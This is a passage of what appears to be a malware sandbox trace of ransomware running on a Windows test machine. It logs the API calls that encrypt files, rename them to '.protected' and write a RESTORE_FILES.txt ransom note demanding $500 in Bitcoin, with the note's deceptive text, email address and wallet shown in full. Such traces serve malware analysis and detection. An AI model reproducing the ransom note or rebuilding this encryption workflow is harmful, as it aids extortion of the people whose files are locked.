(lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="RESTORE_FILES.txt") returned -1 [0090.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".txt") returned 0x0 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".rar") returned 0x0 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".zip") returned 0x0 [0090.347] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.348] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.348] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.349] CloseHandle (hObject=0x150) returned 1 [0090.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected") returned 161 [0090.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected")) returned 1 [0090.349] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Windows") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Program Files") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Program Files (x86)") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="$Recycle.bin") returned 1 [0090.350] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="System Volume Information") returned -1 [0090.350] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrIW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".protected") returned 0x0 [0090.350] lstrcmpW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="RESTORE_FILES.txt") returned -1 [0090.350] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.350] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".txt") returned 0x0 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".rar") returned 0x0 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".zip") returned 0x0 [0090.350] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.351] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, 
lpOverlapped=0x0) returned 1 [0090.351] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.351] CloseHandle (hObject=0x150) returned 1 [0090.351] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected") returned 161 [0090.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected")) returned 1 [0090.352] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Windows") returned -1 [0090.352] lstrcmpiW 
(lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Program Files") returned -1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Program Files (x86)") returned -1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="$Recycle.bin") returned 1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="System Volume Information") returned -1 [0090.352] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrIW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".protected") returned 0x0 [0090.352] lstrcmpW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="RESTORE_FILES.txt") returned -1 [0090.352] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.352] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] 
StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".txt") returned 0x0 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".rar") returned 0x0 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".zip") returned 0x0 [0090.353] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.353] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.353] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.353] CloseHandle (hObject=0x150) returned 1 
[0090.354] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected") returned 161 [0090.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected")) returned 1 [0090.354] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 [0090.354] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.354] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0090.354] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 
[0090.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0090.355] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.355] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.356] WriteFile (in: hFile=0x150, 
lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.356] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.356] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.356] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.356] CloseHandle (hObject=0x150) returned 1 [0090.356] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.protected") returned 134 [0090.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.protected")) returned 1 [0090.357] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.357] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.357] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt") returned 132 [0090.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.358] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.359] lstrlenA (lpString="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") returned 684 [0090.359] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.359] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.359] CloseHandle (hObject=0x14c) returned 1 [0090.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Windows") returned -1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Program Files") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Program Files (x86)") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="$Recycle.bin") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="System Volume Information") returned -1 [0090.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrIW (lpFirst="SYNCHIST", lpSrch=".protected") returned 0x0 [0090.360] lstrcmpW (lpString1="SYNCHIST", lpString2="RESTORE_FILES.txt") returned 1 [0090.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".txt") returned 0x0 [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 